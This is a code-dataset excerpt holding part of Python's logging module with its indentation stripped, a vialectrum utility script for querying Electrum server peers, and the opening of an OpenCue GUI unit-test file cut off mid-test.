raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
self._style = _STYLES[style][0](fmt)
if validate:
self._style.validate()
self._fmt = self._style._fmt
self.datefmt = datefmt
default_time_format = '%Y-%m-%d %H:%M:%S'
default_msec_format = '%s,%03d'
def formatTime(self, record, datefmt=None):
ct = self.converter(record.created)
if datefmt:
s = time.strftime(datefmt, ct)
else:
s = time.strftime(self.default_time_format, ct)
if self.default_msec_format:
s = self.default_msec_format % (s, record.msecs)
return s
def formatException(self, ei):
sio = io.StringIO()
tb = ei[2]
traceback.print_exception(ei[0], ei[1], tb, None, sio)
s = sio.getvalue()
sio.close()
if s[-1:] == "\n":
s = s[:-1]
return s
def usesTime(self):
return self._style.usesTime()
def formatMessage(self, record):
return self._style.format(record)
def formatStack(self, stack_info):
return stack_info
def format(self, record):
record.message = record.getMessage()
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
s = self.formatMessage(record)
if record.exc_info:
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != "\n":
s = s + "\n"
s = s + record.exc_text
if record.stack_info:
if s[-1:] != "\n":
s = s + "\n"
s = s + self.formatStack(record.stack_info)
return s
#
# The default formatter to use when no other is specified
#
_defaultFormatter = Formatter()
class BufferingFormatter(object):
def __init__(self, linefmt=None):
if linefmt:
self.linefmt = linefmt
else:
self.linefmt = _defaultFormatter
def formatHeader(self, records):
return ""
def formatFooter(self, records):
return ""
def format(self, records):
rv = ""
if len(records) > 0:
rv = rv + self.formatHeader(records)
for record in records:
rv = rv + self.linefmt.format(record)
rv = rv + self.formatFooter(records)
return rv
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter(object):
def __init__(self, name=''):
self.name = name
self.nlen = len(name)
def filter(self, record):
if self.nlen == 0:
return True
elif self.name == record.name:
return True
elif record.name.find(self.name, 0, self.nlen) != 0:
return False
return (record.name[self.nlen] == ".")
class Filterer(object):
def __init__(self):
self.filters = []
def addFilter(self, filter):
if not (filter in self.filters):
self.filters.append(filter)
def removeFilter(self, filter):
if filter in self.filters:
self.filters.remove(filter)
def filter(self, record):
rv = True
for f in self.filters:
if hasattr(f, 'filter'):
result = f.filter(record)
else:
result = f(record) # assume callable - will raise if not
if not result:
rv = False
break
return rv
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
_handlers = weakref.WeakValueDictionary() #map of handler names to handlers
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
def _removeHandlerRef(wr):
# This function can be called during module teardown, when globals are
# set to None. It can also be called from another thread. So we need to
# pre-emptively grab the necessary globals and check if they're None,
# to prevent race conditions and failures during interpreter shutdown.
acquire, release, handlers = _acquireLock, _releaseLock, _handlerList
if acquire and release and handlers:
acquire()
try:
if wr in handlers:
handlers.remove(wr)
finally:
release()
def _addHandlerRef(handler):
_acquireLock()
try:
_handlerList.append(weakref.ref(handler, _removeHandlerRef))
finally:
_releaseLock()
class Handler(Filterer):
def __init__(self, level=NOTSET):
Filterer.__init__(self)
self._name = None
self.level = _checkLevel(level)
self.formatter = None
_addHandlerRef(self)
self.createLock()
def get_name(self):
return self._name
def set_name(self, name):
_acquireLock()
try:
if self._name in _handlers:
del _handlers[self._name]
self._name = name
if name:
_handlers[name] = self
finally:
_releaseLock()
name = property(get_name, set_name)
def createLock(self):
self.lock = threading.RLock()
_register_at_fork_reinit_lock(self)
def _at_fork_reinit(self):
self.lock._at_fork_reinit()
def acquire(self):
if self.lock:
self.lock.acquire()
def release(self):
if self.lock:
self.lock.release()
def setLevel(self, level):
self.level = _checkLevel(level)
def format(self, record):
if self.formatter:
fmt = self.formatter
else:
fmt = _defaultFormatter
return fmt.format(record)
def emit(self, record):
raise NotImplementedError('emit must be implemented '
'by Handler subclasses')
def handle(self, record):
rv = self.filter(record)
if rv:
self.acquire()
try:
self.emit(record)
finally:
self.release()
return rv
def setFormatter(self, fmt):
self.formatter = fmt
def flush(self):
pass
def close(self):
_acquireLock()
try: #unlikely to raise an exception, but you never know...
if self._name and self._name in _handlers:
del _handlers[self._name]
finally:
_releaseLock()
def handleError(self, record):
if raiseExceptions and sys.stderr: # see issue 13807
t, v, tb = sys.exc_info()
try:
sys.stderr.write('--- Logging error ---\n')
traceback.print_exception(t, v, tb, None, sys.stderr)
sys.stderr.write('Call stack:\n')
# Walk the stack frame up until we're out of logging,
# so as to print the calling context.
frame = tb.tb_frame
while (frame and os.path.dirname(frame.f_code.co_filename) ==
__path__[0]):
frame = frame.f_back
if frame:
traceback.print_stack(frame, file=sys.stderr)
else:
sys.stderr.write('Logged from file %s, line %s\n' % (
record.filename, record.lineno))
# Issue 18671: output logging message and arguments
try:
sys.stderr.write('Message: %r\n'
'Arguments: %s\n' % (record.msg,
record.args))
except RecursionError: # See issue 36272
raise
except Exception:
sys.stderr.write('Unable to print the message and arguments'
' - possible formatting error.\nUse the'
' traceback above to help find the error.\n'
)
except OSError: #pragma: no cover
pass # see issue 5971
finally:
del t, v, tb
def __repr__(self):
level = getLevelName(self.level)
return '<%s (%s)>' % (self.__class__.__name__, level)
class StreamHandler(Handler):
terminator = '\n'
def __init__(self, stream=None):
Handler.__init__(self)
if stream is None:
stream = sys.stderr
self.stream = stream
def flush(self):
self.acquire()
try:
if self.stream and hasattr(self.stream, "flush"):
self.stream.flush()
finally:
self.release()
def emit(self, record):
try:
msg = self.format(record)
stream = self.stream
# issue 35046: merged two stream.writes into one.
stream.write(msg + self.terminator)
self.flush()
except RecursionError: # See issue 36272
raise
except Exception:
self.handleError(record)
def setStream(self, stream):
if stream is self.stream:
result = None
else:
result = self.stream
self.acquire()
try:
self.flush()
self.stream = stream
finally:
self.release()
return result
def __repr__(self):
level = getLevelName(self.level)
name = getattr(self.stream, 'name', '')
# bpo-36015: name can be an int
name = str(name)
if name:
name += ' '
return '<%s %s(%s)>' % (self.__class__.__name__, name, level)
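# Illustrative sketch (hypothetical names): the long-hand equivalent of
# basicConfig(), wiring a StreamHandler to a logger manually:
#   handler = StreamHandler()                              # stderr by default
#   handler.setFormatter(Formatter('%(levelname)s:%(name)s:%(message)s'))
#   log = getLogger('demo')
#   log.addHandler(handler)
#   log.warning('disk almost full')   # -> WARNING:demo:disk almost full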
class FileHandler(StreamHandler):
def __init__(self, filename, mode='a', encoding=None, delay=False, errors=None):
# Issue #27493: add support for Path objects to be passed in
filename = os.fspath(filename)
#keep the absolute path, otherwise derived classes which use this
#may come a cropper when the current directory changes
self.baseFilename = os.path.abspath(filename)
self.mode = mode
self.encoding = encoding
self.errors = errors
self.delay = delay
if delay:
            #We don't open the stream, but we still need to call the
            #Handler constructor to set level, formatter, lock etc.
Handler.__init__(self)
self.stream = None
else:
StreamHandler.__init__(self, self._open())
def close(self):
self.acquire()
try:
try:
if self.stream:
try:
self.flush()
finally:
stream = self.stream
self.stream = None
if hasattr(stream, "close"):
stream.close()
finally:
StreamHandler.close(self)
finally:
self.release()
def _open(self):
return open(self.baseFilename, self.mode, encoding=self.encoding,
errors=self.errors)
def emit(self, record):
if self.stream is None:
self.stream = self._open()
StreamHandler.emit(self, record)
def __repr__(self):
level = getLevelName(self.level)
return '<%s %s (%s)>' % (self.__class__.__name__, self.baseFilename, level)
class _StderrHandler(StreamHandler):
def __init__(self, level=NOTSET):
Handler.__init__(self, level)
@property
def stream(self):
return sys.stderr
_defaultLastResort = _StderrHandler(WARNING)
lastResort = _defaultLastResort
class PlaceHolder(object):
def __init__(self, alogger):
self.loggerMap = { alogger : None }
def append(self, alogger):
if alogger not in self.loggerMap:
self.loggerMap[alogger] = None
def setLoggerClass(klass):
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
global _loggerClass
_loggerClass = klass
def getLoggerClass():
return _loggerClass
class Manager(object):
def __init__(self, rootnode):
self.root = rootnode
self.disable = 0
self.emittedNoHandlerWarning = False
self.loggerDict = {}
self.loggerClass = None
self.logRecordFactory = None
def getLogger(self, name):
rv = None
if not isinstance(name, str):
raise TypeError('A logger name must be a string')
_acquireLock()
try:
if name in self.loggerDict:
rv = self.loggerDict[name]
if isinstance(rv, PlaceHolder):
ph = rv
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupChildren(ph, rv)
self._fixupParents(rv)
else:
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupParents(rv)
finally:
_releaseLock()
return rv
def setLoggerClass(self, klass):
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
self.loggerClass = klass
def setLogRecordFactory(self, factory):
self.logRecordFactory = factory
def _fixupParents(self, alogger):
name = alogger.name
i = name.rfind(".")
rv = None
while (i > 0) and not rv:
substr = name[:i]
if substr not in self.loggerDict:
self.loggerDict[substr] = PlaceHolder(alogger)
else:
obj = self.loggerDict[substr]
if isinstance(obj, Logger):
rv = obj
else:
assert isinstance(obj, PlaceHolder)
obj.append(alogger)
i = name.rfind(".", 0, i - 1)
if not rv:
rv = self.root
alogger.parent = rv
def _fixupChildren(self, ph, alogger):
name = alogger.name
namelen = len(name)
for c in ph.loggerMap.keys():
if c.parent.name[:namelen] != name:
alogger.parent = c.parent
c.parent = alogger
def _clear_cache(self):
_acquireLock()
for logger in self.loggerDict.values():
if isinstance(logger, Logger):
logger._cache.clear()
self.root._cache.clear()
_releaseLock()
class Logger(Filterer):
def __init__(self, name, level=NOTSET):
Filterer.__init__(self)
self.name = name
self.level = _checkLevel(level)
self.parent = None
self.propagate = True
self.handlers = []
self.disabled = False
self._cache = {}
def setLevel(self, level):
self.level = _checkLevel(level)
self.manager._clear_cache()
def debug(self, msg, *args, **kwargs):
if self.isEnabledFor(DEBUG):
self._log(DEBUG, msg, args, **kwargs)
def info(self, msg, *args, **kwargs):
if self.isEnabledFor(INFO):
self._log(INFO, msg, args, **kwargs)
def warning(self, msg, *args, **kwargs):
if self.isEnabledFor(WARNING):
self._log(WARNING, msg, args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
if self.isEnabledFor(ERROR):
self._log(ERROR, msg, args, **kwargs)
def exception(self, msg, *args, exc_info=True, **kwargs):
self.error(msg, *args, exc_info=exc_info, **kwargs)
def critical(self, msg, *args, **kwargs):
if self.isEnabledFor(CRITICAL):
self._log(CRITICAL, msg, args, **kwargs)
def fatal(self, msg, *args, **kwargs):
self.critical(msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
if not isinstance(level, int):
if raiseExceptions:
raise TypeError("level must be an integer")
else:
return
if self.isEnabledFor(level):
self._log(level, msg, args, **kwargs)
def findCaller(self, stack_info=False, stacklevel=1):
f = currentframe()
if f is not None:
f = f.f_back
orig_f = f
while f and stacklevel > 1:
f = f.f_back
stacklevel -= 1
if not f:
f = orig_f
rv = "(unknown file)", 0, "(unknown function)", None
while hasattr(f, "f_code"):
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == _srcfile:
f = f.f_back
continue
sinfo = None
if stack_info:
sio = io.StringIO()
sio.write('Stack (most recent call last):\n')
traceback.print_stack(f, file=sio)
sinfo = sio.getvalue()
if sinfo[-1] == '\n':
sinfo = sinfo[:-1]
sio.close()
rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)
break
return rv
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func,
sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False,
stacklevel=1):
sinfo = None
if _srcfile:
            #IronPython doesn't track Python frames, so findCaller raises an
            #exception on some versions of IronPython. We trap it here so that
            #IronPython can use logging.
try:
fn, lno, func, sinfo = self.findCaller(stack_info, stacklevel)
except ValueError:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if isinstance(exc_info, BaseException):
exc_info = (type(exc_info), exc_info, exc_info.__traceback__)
elif not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
exc_info, func, extra, sinfo)
self.handle(record)
def handle(self, record):
if (not self.disabled) and self.filter(record):
self.callHandlers(record)
def addHandler(self, hdlr):
_acquireLock()
try:
if not (hdlr in self.handlers):
self.handlers.append(hdlr)
finally:
_releaseLock()
def removeHandler(self, hdlr):
_acquireLock()
try:
if hdlr in self.handlers:
self.handlers.remove(hdlr)
finally:
_releaseLock()
def hasHandlers(self):
c = self
rv = False
while c:
if c.handlers:
rv = True
break
if not c.propagate:
break
else:
c = c.parent
return rv
def callHandlers(self, record):
c = self
found = 0
while c:
for hdlr in c.handlers:
found = found + 1
if record.levelno >= hdlr.level:
hdlr.handle(record)
if not c.propagate:
c = None
else:
c = c.parent
if (found == 0):
if lastResort:
if record.levelno >= lastResort.level:
lastResort.handle(record)
elif raiseExceptions and not self.manager.emittedNoHandlerWarning:
sys.stderr.write("No handlers could be found for logger"
" \"%s\"\n" % self.name)
self.manager.emittedNoHandlerWarning = True
def getEffectiveLevel(self):
logger = self
while logger:
if logger.level:
return logger.level
logger = logger.parent
return NOTSET
def isEnabledFor(self, level):
if self.disabled:
return False
try:
return self._cache[level]
except KeyError:
_acquireLock()
try:
if self.manager.disable >= level:
is_enabled = self._cache[level] = False
else:
is_enabled = self._cache[level] = (
level >= self.getEffectiveLevel()
)
finally:
_releaseLock()
return is_enabled
def getChild(self, suffix):
if self.root is not self:
suffix = '.'.join((self.name, suffix))
return self.manager.getLogger(suffix)
def __repr__(self):
level = getLevelName(self.getEffectiveLevel())
return '<%s %s (%s)>' % (self.__class__.__name__, self.name, level)
def __reduce__(self):
if getLogger(self.name) is not self:
import pickle
raise pickle.PicklingError('logger cannot be pickled')
return getLogger, (self.name,)
class RootLogger(Logger):
def __init__(self, level):
Logger.__init__(self, "root", level)
def __reduce__(self):
return getLogger, ()
_loggerClass = Logger
class LoggerAdapter(object):
def __init__(self, logger, extra=None):
self.logger = logger
self.extra = extra
def process(self, msg, kwargs):
kwargs["extra"] = self.extra
return msg, kwargs
#
# Boilerplate convenience methods
#
def debug(self, msg, *args, **kwargs):
self.log(DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
self.log(INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
self.log(WARNING, msg, *args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self.log(ERROR, msg, *args, **kwargs)
def exception(self, msg, *args, exc_info=True, **kwargs):
self.log(ERROR, msg, *args, exc_info=exc_info, **kwargs)
def critical(self, msg, *args, **kwargs):
self.log(CRITICAL, msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
if self.isEnabledFor(level):
msg, kwargs = self.process(msg, kwargs)
self.logger.log(level, msg, *args, **kwargs)
def isEnabledFor(self, level):
return self.logger.isEnabledFor(level)
def setLevel(self, level):
self.logger.setLevel(level)
def getEffectiveLevel(self):
return self.logger.getEffectiveLevel()
def hasHandlers(self):
return self.logger.hasHandlers()
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):
return self.logger._log(
level,
msg,
args,
exc_info=exc_info,
extra=extra,
stack_info=stack_info,
)
@property
def manager(self):
return self.logger.manager
@manager.setter
def manager(self, value):
self.logger.manager = value
@property
def name(self):
return self.logger.name
def __repr__(self):
logger = self.logger
level = getLevelName(logger.getEffectiveLevel())
return '<%s %s (%s)>' % (self.__class__.__name__, logger.name, level)
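# Illustrative sketch (hypothetical names): LoggerAdapter injects contextual
# data into every record via process(), so formatters can reference it:
#   base = getLogger('net')
#   adapter = LoggerAdapter(base, {'connid': 'abc123'})
#   adapter.info('opened')   # the record carries a .connid attribute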
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
def basicConfig(**kwargs):
# Add thread safety in case someone mistakenly calls
# basicConfig() from multiple threads
_acquireLock()
try:
force = kwargs.pop('force', False)
encoding = kwargs.pop('encoding', None)
errors = kwargs.pop('errors', 'backslashreplace')
if force:
for h in root.handlers[:]:
root.removeHandler(h)
h.close()
if len(root.handlers) == 0:
handlers = kwargs.pop("handlers", None)
if handlers is None:
if "stream" in kwargs and "filename" in kwargs:
raise ValueError("'stream' and 'filename' should not be "
"specified together")
else:
if "stream" in kwargs or "filename" in kwargs:
raise ValueError("'stream' or 'filename' should not be "
"specified together with 'handlers'")
if handlers is None:
filename = kwargs.pop("filename", None)
mode = kwargs.pop("filemode", 'a')
if filename:
                if 'b' in mode:
errors = None
h = FileHandler(filename, mode,
encoding=encoding, errors=errors)
else:
stream = kwargs.pop("stream", None)
h = StreamHandler(stream)
handlers = [h]
dfs = kwargs.pop("datefmt", None)
style = kwargs.pop("style", '%')
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
fs = kwargs.pop("format", _STYLES[style][1])
fmt = Formatter(fs, dfs, style)
for h in handlers:
if h.formatter is None:
h.setFormatter(fmt)
root.addHandler(h)
level = kwargs.pop("level", None)
if level is not None:
root.setLevel(level)
if kwargs:
keys = ', '.join(kwargs.keys())
raise ValueError('Unrecognised argument(s): %s' % keys)
finally:
_releaseLock()
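# Illustrative calls (hypothetical file name):
#   basicConfig(level=DEBUG)                       # root logger to stderr
#   basicConfig(filename='app.log', filemode='w',
#               format='%(asctime)s %(levelname)s %(message)s',
#               force=True)                        # replace existing handlers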
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
if not name or isinstance(name, str) and name == root.name:
return root
return Logger.manager.getLogger(name)
def critical(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.critical(msg, *args, **kwargs)
def fatal(msg, *args, **kwargs):
critical(msg, *args, **kwargs)
def error(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.error(msg, *args, **kwargs)
def exception(msg, *args, exc_info=True, **kwargs):
error(msg, *args, exc_info=exc_info, **kwargs)
def warning(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.warning(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
warnings.warn("The 'warn' function is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
warning(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.log(level, msg, *args, **kwargs)
def disable(level=CRITICAL):
root.manager.disable = level
root.manager._clear_cache()
def shutdown(handlerList=_handlerList):
for wr in reversed(handlerList[:]):
#errors might occur, for example, if files are locked
#we just ignore them if raiseExceptions is not set
try:
h = wr()
if h:
try:
h.acquire()
h.flush()
h.close()
except (OSError, ValueError):
# Ignore errors which might be caused
# because handlers have been closed but
# references to them are still around at
# application exit.
pass
finally:
h.release()
except: # ignore everything, as we're shutting down
if raiseExceptions:
raise
import atexit
atexit.register(shutdown)
# Null handler
class NullHandler(Handler):
    def handle(self, record):
        pass
    def emit(self, record):
        pass
def createLock(self):
self.lock = None
def _at_fork_reinit(self):
pass
# Warnings integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(message, category, filename, lineno, line)
logger = getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
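A minimal end-to-end sketch of the API defined above, assuming the module is
importable as the standard-library logging package (logger name and messages
are illustrative):

import logging

logging.basicConfig(level=logging.INFO)     # one-time root configuration
log = logging.getLogger('example')          # child logger; propagates to root
log.info('service started')                 # emitted via the root StreamHandler
logging.captureWarnings(True)               # route warnings to 'py.warnings'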
is_comment_constant_removed: true
is_sharp_comment_removed: true

hexsha: 1c446fe63b5d182b69d71768d1bb0b75c5c60426
size: 3,049
ext: py
lang: Python
max_stars_repo_path: scripts/util.py
max_stars_repo_name: TheCharlatan/vialectrum
max_stars_repo_head_hexsha: c54cd9aa08835db985d77ead9d91a00d66afa4b0
max_stars_repo_licenses: ["MIT"]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: scripts/util.py
max_issues_repo_name: TheCharlatan/vialectrum
max_issues_repo_head_hexsha: c54cd9aa08835db985d77ead9d91a00d66afa4b0
max_issues_repo_licenses: ["MIT"]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: scripts/util.py
max_forks_repo_name: TheCharlatan/vialectrum
max_forks_repo_head_hexsha: c54cd9aa08835db985d77ead9d91a00d66afa4b0
max_forks_repo_licenses: ["MIT"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
import select, time, queue
# import vialectrum as electrum
from vialectrum import Connection, Interface, SimpleConfig
from vialectrum.network import parse_servers
from collections import defaultdict
# electrum.util.set_verbosity(1)
def get_interfaces(servers, timeout=10):
'''Returns a map of servers to connected interfaces. If any
connections fail or timeout, they will be missing from the map.
'''
socket_queue = queue.Queue()
config = SimpleConfig()
connecting = {}
for server in servers:
if server not in connecting:
connecting[server] = Connection(server, socket_queue, config.path)
interfaces = {}
timeout = time.time() + timeout
count = 0
while time.time() < timeout and count < len(servers):
try:
server, socket = socket_queue.get(True, 0.3)
except queue.Empty:
continue
if socket:
interfaces[server] = Interface(server, socket)
count += 1
return interfaces
def wait_on_interfaces(interfaces, timeout=10):
'''Return a map of servers to a list of (request, response) tuples.
Waits timeout seconds, or until each interface has a response'''
result = defaultdict(list)
timeout = time.time() + timeout
while len(result) < len(interfaces) and time.time() < timeout:
rin = [i for i in interfaces.values()]
win = [i for i in interfaces.values() if i.unsent_requests]
rout, wout, xout = select.select(rin, win, [], 1)
for interface in wout:
interface.send_requests()
for interface in rout:
responses = interface.get_responses()
if responses:
result[interface.server].extend(responses)
return result
def get_peers():
config = SimpleConfig()
peers = {}
# 1. get connected interfaces
server = config.get('server')
interfaces = get_interfaces([server])
if not interfaces:
print("No connection to", server)
return []
# 2. get list of peers
interface = interfaces[server]
interface.queue_request('server.peers.subscribe', [], 0)
responses = wait_on_interfaces(interfaces).get(server)
if responses:
response = responses[0][1] # One response, (req, response) tuple
peers = parse_servers(response.get('result'))
return peers
def send_request(peers, method, params):
print("Contacting %d servers"%len(peers))
interfaces = get_interfaces(peers)
print("%d servers could be reached" % len(interfaces))
for peer in peers:
if not peer in interfaces:
print("Connection failed:", peer)
for msg_id, i in enumerate(interfaces.values()):
i.queue_request(method, params, msg_id)
responses = wait_on_interfaces(interfaces)
for peer in interfaces:
if not peer in responses:
print(peer, "did not answer")
results = dict(zip(responses.keys(), [t[0][1].get('result') for t in responses.values()]))
print("%d answers"%len(results))
return results
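A hedged usage sketch of the helpers above; the protocol method, its
parameters, and the 'host:port:protocol' peer format are assumptions about the
Electrum server protocol, not guarantees made by this file:

peers = ['electrum.example.org:50002:s']              # assumed peer format
results = send_request(peers, 'server.version', [])   # illustrative method
for server, result in results.items():
    print(server, result)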
avg_line_length: 36.297619
max_line_length: 94
alphanum_fraction: 0.653329
is_comment_constant_removed: true
is_sharp_comment_removed: true

hexsha: 1c447221d6f4f975dfff9f8ae842a6682412100a
size: 8,187
ext: py
lang: Python
max_stars_repo_path: cuegui/tests/FrameMonitorTree_tests.py
max_stars_repo_name: srbhss/OpenCue
max_stars_repo_head_hexsha: c0b8aeab0ea324c3c46541d98b4a968230c668eb
max_stars_repo_licenses: ["Apache-2.0"]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: cuegui/tests/FrameMonitorTree_tests.py
max_issues_repo_name: srbhss/OpenCue
max_issues_repo_head_hexsha: c0b8aeab0ea324c3c46541d98b4a968230c668eb
max_issues_repo_licenses: ["Apache-2.0"]
max_issues_count: 2
max_issues_repo_issues_event_min_datetime: 2019-10-02T23:58:20.000Z
max_issues_repo_issues_event_max_datetime: 2020-03-30T19:18:48.000Z
max_forks_repo_path: cuegui/tests/FrameMonitorTree_tests.py
max_forks_repo_name: srbhss/OpenCue
max_forks_repo_head_hexsha: c0b8aeab0ea324c3c46541d98b4a968230c668eb
max_forks_repo_licenses: ["Apache-2.0"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
# Copyright (c) 2018 Sony Pictures Imageworks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import unittest
import PySide2.QtCore
import PySide2.QtGui
import PySide2.QtTest
import PySide2.QtWidgets
import cuegui.Constants
import cuegui.FrameMonitor
import cuegui.FrameMonitorTree
import cuegui.Main
import cuegui.plugins.MonitorJobDetailsPlugin
import cuegui.Style
import opencue.compiled_proto.job_pb2
import opencue.wrappers.frame
import opencue.wrappers.job
from . import test_utils
@mock.patch('opencue.cuebot.Cuebot.getStub', new=mock.Mock())
class FrameMonitorTreeTests(unittest.TestCase):
@mock.patch('opencue.cuebot.Cuebot.getStub', new=mock.Mock())
def setUp(self):
test_utils.createApplication()
PySide2.QtGui.qApp.settings = PySide2.QtCore.QSettings()
cuegui.Style.init()
self.parentWidget = PySide2.QtWidgets.QWidget()
self.frameMonitorTree = cuegui.FrameMonitorTree.FrameMonitorTree(self.parentWidget)
self.job = opencue.wrappers.job.Job(opencue.compiled_proto.job_pb2.Job(id='foo'))
self.frameMonitorTree.setJob(self.job)
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames', autospec=True)
def test_tickInitialLoad(self, getFramesMock):
frames = [
opencue.wrappers.frame.Frame(
opencue.compiled_proto.job_pb2.Frame(name='frame1')),
opencue.wrappers.frame.Frame(
opencue.compiled_proto.job_pb2.Frame(name='frame2'))]
getFramesMock.return_value = frames
self.frameMonitorTree.tick()
getFramesMock.assert_called_with(self.job)
@mock.patch.object(opencue.wrappers.job.Job, 'getUpdatedFrames')
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames')
def test_tickNoUpdate(self, getFramesMock, getUpdatedFramesMock):
getFramesMock.return_value = []
# Initial load.
self.frameMonitorTree.tick()
getFramesMock.reset_mock()
getUpdatedFramesMock.reset_mock()
self.frameMonitorTree.tick()
getFramesMock.assert_not_called()
getUpdatedFramesMock.assert_not_called()
@mock.patch.object(opencue.wrappers.job.Job, 'getUpdatedFrames', autospec=True)
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames')
def test_tickUpdateChanged(self, getFramesMock, getUpdatedFramesMock):
getFramesMock.return_value = []
getUpdatedResponse = opencue.compiled_proto.job_pb2.JobGetUpdatedFramesResponse(
state=opencue.compiled_proto.job_pb2.RUNNING,
server_time=1000,
updated_frames=opencue.compiled_proto.job_pb2.UpdatedFrameSeq(
updated_frames=[opencue.compiled_proto.job_pb2.UpdatedFrame(id='foo')]))
getUpdatedFramesMock.return_value = getUpdatedResponse
# Initial load.
self.frameMonitorTree.tick()
getFramesMock.reset_mock()
self.frameMonitorTree.updateChangedRequest()
self.frameMonitorTree.tick()
getFramesMock.assert_not_called()
getUpdatedFramesMock.assert_called_with(self.job, mock.ANY)
@mock.patch.object(opencue.wrappers.job.Job, 'getUpdatedFrames')
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames', autospec=True)
def test_tickFullUpdate(self, getFramesMock, getUpdatedFramesMock):
getFramesMock.return_value = []
getUpdatedResponse = opencue.compiled_proto.job_pb2.JobGetUpdatedFramesResponse(
state=opencue.compiled_proto.job_pb2.RUNNING,
server_time=1000,
updated_frames=opencue.compiled_proto.job_pb2.UpdatedFrameSeq(
updated_frames=[opencue.compiled_proto.job_pb2.UpdatedFrame(id='foo')]))
getUpdatedFramesMock.return_value = getUpdatedResponse
# Initial load.
self.frameMonitorTree.tick()
self.frameMonitorTree.updateRequest()
self.frameMonitorTree.tick()
getFramesMock.assert_called_with(self.job)
getUpdatedFramesMock.assert_not_called()
def test_getCores(self):
frame = opencue.wrappers.frame.Frame(opencue.compiled_proto.job_pb2.Frame(last_resource='foo/125.82723'))
self.assertEqual(125.82723, self.frameMonitorTree.getCores(frame))
self.assertEqual('125.83', self.frameMonitorTree.getCores(frame, format=True))
@mock.patch.object(cuegui.FrameMonitorTree.FrameContextMenu, 'exec_')
def test_rightClickItem(self, execMock):
